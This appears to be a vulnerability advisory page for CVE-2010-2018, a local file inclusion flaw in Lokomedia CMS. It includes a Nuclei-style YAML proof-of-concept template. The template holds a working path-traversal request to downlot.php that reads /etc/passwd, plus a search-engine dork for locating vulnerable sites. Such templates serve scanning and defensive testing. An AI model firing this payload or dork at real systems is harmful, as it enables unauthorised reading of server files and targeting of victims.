CVE-2010-2018: Lokomedia CMS - Local File Inclusion

2025-08-01 Lokomedia CMS PoC Public

Description

A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.

PoC

id: CVE-2010-2018

info:
  name: Lokomedia CMS - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: A Local File Inclusion (LFI) vulnerability exists in Lokomedia CMS. The application allows an attacker to include files on the server that should not be accessible, potentially exposing sensitive information.
  impact: |
    Attackers can read sensitive files from the server, potentially leading to information disclosure.
  remediation: |
    Update to the latest version or apply security patches to fix the vulnerability.
  reference:
    - https://cxsecurity.com/issue/WLB-2018070116
    - https://github.com/kangkuswae/CMS-Lokomedia
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2018
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2018
    epss-score: 0.03258
    epss-percentile: 0.87731
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:/semua-download.html
  tags: cve,cve2010,lfi,lokomedia,cms,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/proses"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dab5dc33d29e049739665afcfa723586fcac60c85319c20abcde3861a163000b02202f6c369d0aecf15720a69554c2eb7a0aec2d989188205b30b53eb637dd0f13e5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities